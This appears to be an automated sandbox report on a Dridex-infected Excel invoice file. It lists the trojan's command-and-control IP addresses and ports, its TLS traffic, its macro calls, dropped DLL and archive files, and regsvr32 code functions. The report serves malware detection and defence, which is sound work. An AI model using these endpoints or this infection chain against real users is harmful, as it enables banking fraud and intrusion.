Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknownTCP traffic detected without corresponding DNS query: 77.220.64.37
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003D39F9 InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F82396A.emfJump to behavior
Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: media-server.skyinternet.com.pk
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.7.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: DWWIN.EXE, 00000007.00000002.2238503044.00000000004A8000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
Source: DWWIN.EXE, 00000007.00000002.2238488344.0000000000482000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enpw
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2243054454.0000000003900000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000002.2238527627.00000000004E9000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000007.00000002.2243113739.0000000003952000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2392785990.0000000001DF0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2392840096.0000000001CC0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2238957386.0000000002310000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2393787843.00000000020C0000.00000002.00000001.sdmp, DWWIN.EXE, 00000007.00000002.2243298367.0000000003EA0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238072484.000000000397A000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000007.00000002.2242807574.0000000003677000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000007.00000002.2242553500.0000000003490000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpString found in binary or memory: https://46.105.131.65:1512/t
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/
Source: regsvr32.exe, 00000004.00000002.2392699066.00000000004DF000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/7Q
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpString found in binary or memory: https://5.100.228.233:3389/T
Source: regsvr32.exe, 00000004.00000002.2392732468.000000000050F000.00000004.00000020.sdmpString found in binary or memory: https://77.220.64.37/
Source: regsvr32.exe, 00000004.00000002.2392793966.000000000059C000.00000004.00000020.sdmpString found in binary or memory: https://80.86.91.27:3308/
Source: regsvr32.exe, 00000004.00000002.2392748354.0000000000523000.00000004.00000020.sdmp, DWWIN.EXE, 00000007.00000003.2238067186.0000000003973000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49348
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49288 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49344
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49340
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 49336 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49380 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49336
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49332
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49292
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49316 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49368 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49360 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49328
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 49292 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49324
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
Source: unknownNetwork traffic detected: HTTP traffic on port 49324 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49288
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49320
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49372 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49344 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49316
Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49312
Source: unknownNetwork traffic detected: HTTP traffic on port 49304 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49396
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49392
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49304
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49268
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49300
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49388
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49384
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49380
Source: unknownNetwork traffic detected: HTTP traffic on port 49384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49376
Source: unknownNetwork traffic detected: HTTP traffic on port 49190 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49372
Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49312 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49408
Source: unknownNetwork traffic detected: HTTP traffic on port 49364 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49404
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49376 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49368
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49364
Source: unknownNetwork traffic detected: HTTP traffic on port 49408 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49360
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49340 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49268 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49356
Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
Source: unknownNetwork traffic detected: HTTP traffic on port 49300 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49352
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49190
Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49320 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49328 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
Source: unknownHTTPS traffic detected: 217.174.149.3:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49186 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49190 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49198 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49202 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49210 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49214 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49222 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49226 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49232 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49240 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49244 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49252 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49256 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49264 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49268 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49276 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49280 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49288 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49292 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49300 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49304 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49312 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49316 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49320 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49324 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49328 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49332 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49336 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49340 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49344 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49348 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49356 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49360 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49364 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49368 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49372 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49376 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49380 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49384 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49392 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49396 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49400 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49404 version: TLS 1.2
Source: unknownHTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49408 version: TLS 1.2

E-Banking Fraud:

barindex
Detected Dridex e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003A5150 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,LoadLibraryW,
Source: C:\Windows\System32\DWWIN.EXEFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCCJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro which may execute processesShow sources
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: INV8222874744_20210111490395.xlsmInitial sample: CALL
Source: INV8222874744_20210111490395.xlsmInitial sample: CALL
Source: INV8222874744_20210111490395.xlsmInitial sample: CALL
Source: INV8222874744_20210111490395.xlsmInitial sample: CALL
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\bjcbglsw.dllJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hhsz1e0[1].rarJump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CBE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0025B780 VirtualAlloc,VirtualAlloc,NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_0025BA14 NtSetInformationProcess,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003A5150
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BD030
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C1020
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C5CB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BE0A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CDCA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C50A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C4CA0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B98DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003AACD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BA0D0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B88C0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B8CC0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003A1570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B7564
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003AF9A0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BC590
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BD980
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CD180
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C89F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C71F0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BFDD0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C0220
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CD620
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003ACA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003CFA10
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003A9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B9E70
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BA660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C7660
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C2E60
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C1240
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003B8AB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C1EB0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003C26B0
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BAE80
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_003BB6F0
